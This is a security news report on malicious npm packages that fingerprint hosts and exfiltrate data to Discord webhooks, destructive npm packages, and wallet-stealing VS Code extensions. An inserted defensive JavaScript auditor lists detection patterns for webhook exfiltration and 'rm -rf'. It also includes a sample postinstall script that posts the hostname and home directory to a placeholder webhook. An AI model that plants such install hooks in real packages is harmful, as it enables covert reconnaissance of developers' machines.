60 Malicious npm Packages Discovered with Discord-Controlled Endpoint

Threat actors have published over 60 malicious npm packages that harvest hostnames, IP addresses, and user directories and send them to a Discord-controlled endpoint. The packages were discovered by security researchers Kirill Boychenko and Kush Pandya, who revealed the malicious functionality in a report last week.

The affected packages have been installed over 3,000 times and include basic sandbox-evasion checks, which makes every infected workstation or continuous-integration node a potential source of valuable reconnaissance. The malicious code fingerprints every machine that installs a package, but aborts execution if it detects that it is running in a virtualized environment associated with Amazon, Google, or other providers.

The harvested information is then transmitted to a Discord webhook, enabling threat actors to chart the network and identify high-value targets for future campaigns. This is not an isolated incident: another set of eight npm packages was discovered masquerading as helper libraries for widely used JavaScript frameworks, deploying destructive payloads once installed.

Security researchers warned that some of the identified packages execute automatically once developers invoke them in their projects, recursively deleting files related to Vue.js, React, and Vite. Others are designed to corrupt fundamental JavaScript methods or tamper with browser storage mechanisms like localStorage, sessionStorage, and cookies.
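The npm behaviours described above (install-time execution, host fingerprinting, cloud/VM checks, Discord webhook exfiltration, recursive deletion) can be triaged with a lightweight audit of a package's manifest and the scripts its lifecycle hooks run. The following is an added example written for this summary, not code from the article or the researchers' report; the package name, file names and webhook URL in the sample input are constructed placeholders, and the indicator regexes are rough triage heuristics rather than proof of malice.

```javascript
// Heuristic audit of an npm package: flags install-time lifecycle hooks and
// the behaviours the article describes (host fingerprinting, Discord webhook
// exfiltration, cloud/VM checks, recursive deletion). Triage only.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const INDICATORS = [
  { label: "discord-webhook", re: /discord(?:app)?\.com\/api\/webhooks\//i },
  { label: "host-fingerprint", re: /os\.(?:hostname|userInfo|networkInterfaces|homedir)\s*\(/ },
  { label: "cloud-vm-check", re: /amazon|google|aws|gce|virtualbox|vmware|qemu/i },
  { label: "recursive-delete", re: /rm\s+-rf|rmSync\([^)]*recursive|rimraf/ },
];

// manifest: parsed package.json; files: map of relative path -> source text.
function auditPackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts ?? {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    findings.push({ where: hook, label: "install-hook", detail: cmd });
    // If the hook runs `node <file>`, scan that file's source as well.
    const m = cmd.match(/\bnode\s+(\S+)/);
    for (const src of [cmd, m && files[m[1]]].filter(Boolean)) {
      for (const { label, re } of INDICATORS) {
        const hit = src.match(re);
        if (hit) findings.push({ where: hook, label, detail: hit[0] });
      }
    }
  }
  return findings;
}

// Install hook plus exfiltration or deletion is high; hook plus fingerprinting is medium.
function riskLevel(findings) {
  const labels = new Set(findings.map((f) => f.label));
  if (!labels.has("install-hook")) return "low";
  if (labels.has("discord-webhook") || labels.has("recursive-delete")) return "high";
  if (labels.has("host-fingerprint") || labels.has("cloud-vm-check")) return "medium";
  return "low";
}

// Constructed sample (placeholder package name and webhook URL) mirroring the
// behaviour the article describes; not code from any real package.
const SAMPLE_MANIFEST = { name: "placeholder-pkg", scripts: { postinstall: "node setup.js" } };
const SAMPLE_FILES = {
  "setup.js": [
    "const os = require('os');",
    "if (/amazon|google/i.test(os.hostname())) process.exit(0);",
    "fetch('https://discord.com/api/webhooks/PLACEHOLDER', { method: 'POST', body: JSON.stringify({ host: os.hostname(), home: os.homedir() }) });",
  ].join("\n"),
};
```

Running `riskLevel(auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES))` on the sample returns "high"; in practice, run the audit over every package in a lockfile before the install step, and treat any lifecycle hook in a package you did not expect to need one as worth a manual look.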

The activity has been traced to a threat actor named xuxingfeng, who also published five legitimate packages that work as intended. However, the threat actor’s approach of releasing both harmful and helpful packages creates a facade of legitimacy, making malicious packages more likely to be trusted and installed.

Furthermore, researchers discovered a novel attack campaign that combines traditional email phishing with JavaScript code from a malicious npm package disguised as a benign open-source library. The phishing attack demonstrates a high level of sophistication, using technologies like AES encryption, npm packages delivered through a CDN, and multiple redirections to mask malicious intentions.

Additionally, Datadog Security Research uncovered three malicious VS Code extensions that were engineered to siphon cryptocurrency wallet credentials by targeting Solidity developers on Windows. The extensions disguise themselves as legitimate, concealing harmful code within genuine features, and use command-and-control domains that appear relevant to Solidity.

The threat actor behind the VS Code extensions is tracked as MUT-9332, who is also behind a recently disclosed campaign in which 10 malicious VS Code extensions installed an XMRig cryptominer. This demonstrates the surprising lengths to which MUT-9332 will go to conceal their malicious intentions, and suggests that subsequent campaigns may be even more creative in their approach.

Source: https://thehackernews.com/2025/05/over-70-malicious-npm-and-vs-code.html